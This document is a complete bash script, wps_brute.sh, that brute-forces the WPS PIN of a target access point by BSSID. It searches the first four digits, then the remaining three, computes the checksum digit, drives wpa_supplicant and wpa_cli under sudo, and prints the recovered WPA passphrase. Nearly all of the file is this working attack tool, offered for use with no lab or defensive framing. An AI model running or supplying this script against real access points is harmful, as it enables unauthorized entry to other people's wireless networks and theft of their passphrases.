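#!/bin/bash
# wps_brute.sh - brute-force the WPS PIN of one access point in two phases
# (first four digits, then the remaining three; the eighth digit is a
# checksum), driving wpa_supplicant/wpa_cli from /opt/wpa_supplicant.
#
# Usage:  wps_brute.sh <BSSID>
# Env:    IFACE   - wireless interface to use (default: wlan0)
#         TIMEOUT - seconds to wait for a verdict on each PIN (default: 10),
#                   passed straight to timeout(1)
#
# Requires sudo for wpa_supplicant/wpa_cli.  On success the passphrase is read
# back from /tmp/wps_brute/wpa_supplicant.conf, and that file keeps the
# recovered secret after the run - delete it when you are done.
RED='\x1b[31m'
GREEN='\x1b[32m'
GREY='\x1b[90m'
RESET='\x1b[0m'
bssid="$1"
if [[ -z "$bssid" ]]; then
  # Without a target every wps_reg call would fail and the loops would burn
  # 10000 x TIMEOUT seconds reporting nothing useful.
  printf 'Usage: %s <BSSID>\n' "${0##*/}" >&2
  exit 1
fi
IFACE="${IFACE:-wlan0}"
TIMEOUT="${TIMEOUT:-10}"
# timeout(1) takes a number with an optional s/m/h/d suffix; anything else
# would make every attempt fail instantly and be reported as 'fail'.
if ! [[ "$TIMEOUT" =~ ^[0-9]+(\.[0-9]+)?[smhd]?$ ]]; then
  printf 'TIMEOUT must be a duration accepted by timeout(1), got %q\n' "$TIMEOUT" >&2
  exit 1
fi
# Working directory for the supplicant config.  The path is fixed because
# connect() hard-codes it.  Root (sudo tee, then wpa_supplicant) will write
# a fixed filename inside it, so it must be private to us: a world-writable
# directory would let another local user plant a symlink at that name and
# have root follow it.  Only the unprivileged reads in this script touch the
# directory otherwise, which needs nothing beyond owner permissions.
work_dir=/tmp/wps_brute
if ! mkdir -m 700 "$work_dir" 2> /dev/null; then
  # Already exists (normal on a re-run) - but refuse anything that is not a
  # plain directory we own, and refuse a pre-planted symlink at the config
  # path, before root is pointed at it.
  if [[ -L "$work_dir" || ! -d "$work_dir" || ! -O "$work_dir" ]]; then
    printf '%s exists but is not a directory owned by you; refusing to use it\n' "$work_dir" >&2
    exit 1
  fi
  conf="$work_dir/wpa_supplicant.conf"
  if [[ -L "$conf" || ( -e "$conf" && ! -f "$conf" ) ]]; then
    printf '%s is not a regular file; refusing to use it\n' "$conf" >&2
    exit 1
  fi
  # Close the world-writable mode left behind by earlier versions of this script.
  chmod 700 "$work_dir"
fi
# connect() assigns a variable inside a `cmd | while read` loop; lastpipe runs
# the last pipeline stage in the current shell so that assignment survives.
shopt -s lastpipe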
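#######################################
# Try one WPS PIN against the target and classify the outcome.
# Globals:   IFACE, TIMEOUT (read)
# Arguments: $1 - target BSSID
#            $2 - 8-digit WPS PIN
# Outputs:   exactly one word on stdout:
#              success - wpa_supplicant wrote a psk= line into the config
#                        (update_config=1 makes it persist the network it
#                        registered), i.e. the full PIN was accepted
#              half    - a WPS failure event carrying msg=10; presumably the
#                        exchange got as far as M6, meaning the first half of
#                        the PIN was accepted and the second rejected - TODO
#                        confirm against the wpa_supplicant WPS-FAIL format
#              wrong   - any other msg= failure event
#              fail    - no failure event and no psk before the timeout or
#                        a disconnect/terminate event
# Returns:   0
# Relies on `shopt -s lastpipe` being set at file scope so the verdict
# assigned inside the read loop is visible after the pipeline.
#######################################
connect() {
  local conf=/tmp/wps_brute/wpa_supplicant.conf
  local line verdict='fail'
  # Fresh, network-free config on every attempt, so a psk= left over from an
  # earlier attempt can never be mistaken for success.
  # NOTE(review): the write and the later reads use a fixed path; if that
  # directory is writable by other local users, the file can be swapped
  # between here and the root-privileged supplicant reading it.
  printf 'ctrl_interface=/var/run/wpa_supplicant\nctrl_interface_group=0\nupdate_config=1\n' \
    | sudo tee "$conf" > /dev/null
  # Start the registrar exchange after giving the supplicant a second to
  # bring up its control socket.  Runs in the background so the event loop
  # below can start consuming output immediately; it is not reaped.
  { sleep 1; sudo /opt/wpa_supplicant/wpa_cli wps_reg "$1" "$2" > /dev/null; } &
  # wpa_supplicant in the foreground prints its event lines on stdout; stop
  # reading once it reports a disconnect or is terminating (timeout expiry).
  sudo timeout "$TIMEOUT" /opt/wpa_supplicant/wpa_supplicant -i "$IFACE" -c "$conf" \
    | while IFS= read -r line; do
        case "$line" in
          *msg=10*) verdict='half' ;;
          *msg=*) verdict='wrong' ;;
          *CTRL-EVENT-DISCONNECTED*|*CTRL-EVENT-TERMINATING*) break ;;
        esac
      done
  # A written psk= is the authoritative success signal and overrides any
  # failure event seen on the way.
  if grep -q 'psk=' "$conf"; then
    echo 'success'
  else
    echo "$verdict"
  fi
}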
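#######################################
# Compute the eighth (check) digit of a WPS PIN.
# Arguments: $1 - the first seven PIN digits, decimal, leading zeros allowed
# Outputs:   the check digit (0-9) on stdout
# Returns:   0; 1 (with no output) if the argument is not all digits
#######################################
checksum() {
  # Reject anything that is not a decimal string up front: a stray character
  # would otherwise make the integer assignment fail and yield a bogus "0".
  if ! [[ "$1" =~ ^[0-9]+$ ]]; then
    printf 'checksum: expected digits, got %q\n' "$1" >&2
    return 1
  fi
  # Explicit base 10 so a leading zero ("0012345") is not read as octal.
  local -i pin="10#$1"
  local -i accum=0
  # Weights alternate 3,1,3,1,... starting from the least-significant digit.
  while (( pin > 0 )); do
    accum+=$(( 3 * (pin % 10) ))
    pin=$(( pin / 10 ))
    accum+=$(( pin % 10 ))
    pin=$(( pin / 10 ))
  done
  echo $(( (10 - accum % 10) % 10 ))
}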
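#######################################
# Print the recovered passphrase line from the supplicant config.
# wpa_supplicant stores it as an indented `psk=...` line; only the indent is
# stripped, so a passphrase containing spaces is printed whole (printing the
# first awk field would cut it at the first space).
#######################################
print_psk() {
  sed -n 's/^[[:space:]]*\(psk=.*\)$/\1/p' /tmp/wps_brute/wpa_supplicant.conf
}

# Phase 1: recover the first four digits.  The last three are held at 000 and
# the eighth is the checksum; a 'half' verdict from connect() means the AP
# accepted the first half and rejected the rest, which pins down p1.
found_half=0
for p1 in {0000..9999}; do
  p2='000'
  chs=$(checksum "$p1$p2")
  pin="$p1$p2$chs"
  printf '%b%s\r%b' "$GREY" "$pin" "$RESET"
  result=$(connect "$bssid" "$pin")
  case "$result" in
    'success')
      # The real PIN happens to end in 000: nothing left to search.
      printf '%b%s%b\n' "$GREEN" "$pin" "$RESET"
      print_psk
      exit 0
      ;;
    'half')
      printf '%b%s%b%s\n' "$GREEN" "$p1" "$RESET" "$p2$chs"
      found_half=1
      break
      ;;
    'wrong')
      printf '%b%s%b%s\n' "$RED" "$p1" "$RESET" "$p2$chs"
      ;;
    'fail')
      # No verdict within TIMEOUT.  NOTE(review): the candidate is not
      # retried, so a transient failure (AP lock-out, lost frame) silently
      # drops it from the search.
      echo ''
      ;;
  esac
done
# Without this check an unsuccessful phase 1 would leave p1 at 9999 and
# phase 2 would quietly brute-force the second half of a wrong prefix.
if (( ! found_half )); then
  printf 'first half of the PIN not found for %s; giving up\n' "$bssid" >&2
  exit 1
fi

# Phase 2: with p1 fixed, walk the remaining three digits.
found_pin=0
for p2 in {000..999}; do
  chs=$(checksum "$p1$p2")
  pin="$p1$p2$chs"
  printf '%b%s\r%b' "$GREY" "$pin" "$RESET"
  result=$(connect "$bssid" "$pin")
  case "$result" in
    'success')
      printf '%b%s%b\n' "$GREEN" "$pin" "$RESET"
      print_psk
      found_pin=1
      break
      ;;
    'wrong'|'half')
      # 'half' here only says the second half was rejected again.
      printf '%b%s%b%s%b%s\n' "$GREEN" "$p1" "$RED" "$p2" "$RESET" "$chs"
      ;;
    'fail')
      # See the phase 1 note: not retried.
      echo ''
      ;;
  esac
done
if (( ! found_pin )); then
  printf 'second half of the PIN not found for %s (first half %s)\n' "$bssid" "$p1" >&2
  exit 1
fi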